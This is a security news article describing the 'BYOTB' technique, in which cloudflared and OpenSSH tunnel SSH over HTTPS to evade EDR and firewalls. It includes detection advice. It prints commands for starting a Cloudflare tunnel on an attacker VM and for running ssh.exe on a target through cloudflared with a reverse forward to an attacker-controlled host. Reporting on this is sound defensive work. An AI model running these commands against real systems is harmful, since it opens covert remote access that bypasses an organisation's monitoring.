New ‘BYOTB’ Attack Exploits Trusted Binaries to Evade Detection, Researchers Reveal

   February 10, 2025  Posted in CyberSecurityNews


Security researcher David Kennedy unveiled a novel attack technique known as “BYOTB” (Bring Your Own Trusted Binary) in a recent presentation at BSides London 2024, which leverages trusted binaries to bypass security measures and evade detection.

This approach exploits the trust placed in legitimate software by using it in adversarial ways, making it challenging for security systems to identify malicious activity.

The BYOTB attack focuses on using trusted binaries like Cloudflare’s cloudflared and OpenSSH to create covert communication channels.

SIEM as a Service

SSH server running on Cloud VM (Source – JumpSec)

Experts at JumpSec Labs noted that all these binaries are chosen because they are widely used and trusted, making them less likely to be flagged by security software.

Using Cloudflared for Covert Communication

One of the primary methods involves using cloudflared to tunnel SSH traffic over HTTPS on port 443, bypassing traditional SSH port 22 restrictions.

This is achieved by configuring cloudflared to act as a proxy for SSH connections, encapsulating the data as HTTPS traffic.

Cloudflare’s WARP client acts like a VPN (Source – JumpSec)

Here’s how it works:-

  1. Setup Cloudflare Tunnel: On a cloud VM (e.g., Kali), start a Cloudflare tunnel using:
   cloudflared tunnel run --token YourTokenHere
  1. Establish SSH Connection: On the target machine, use cloudflared as a proxy for SSH:
   ssh.exe -o ProxyCommand="cloudflared.exe access ssh --hostname %h" [email protected] -R 1080

This command establishes an SSH connection through cloudflared, which forwards traffic to a controlled Cloudflare hostname (ssh.redteaming.org), ultimately reaching the SSH server on the Kali VM.

Cloudflared SSH Tunnel Setup (Source – JumpSec)

The BYOTB attack is designed to bypass Endpoint Detection and Response (EDR) systems like CrowdStrike and navigate through restrictive firewalls.

By using trusted binaries, attackers can avoid triggering alerts typically associated with malicious activity.

To defend against these attacks, organizations should implement several measures. They should process telemetry by monitoring for command-line switches like “tunnel” or “access” that are associated with trusted binaries.

While the DNS logging should be used to track queries ending in “argotunnel.com” to detect Cloudflared activity, while firewall logging should block unnecessary outbound traffic on port 7844.

Besides this, file monitoring is essential to track downloads of Cloudflared binaries and verify their hashes.

Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free



Source link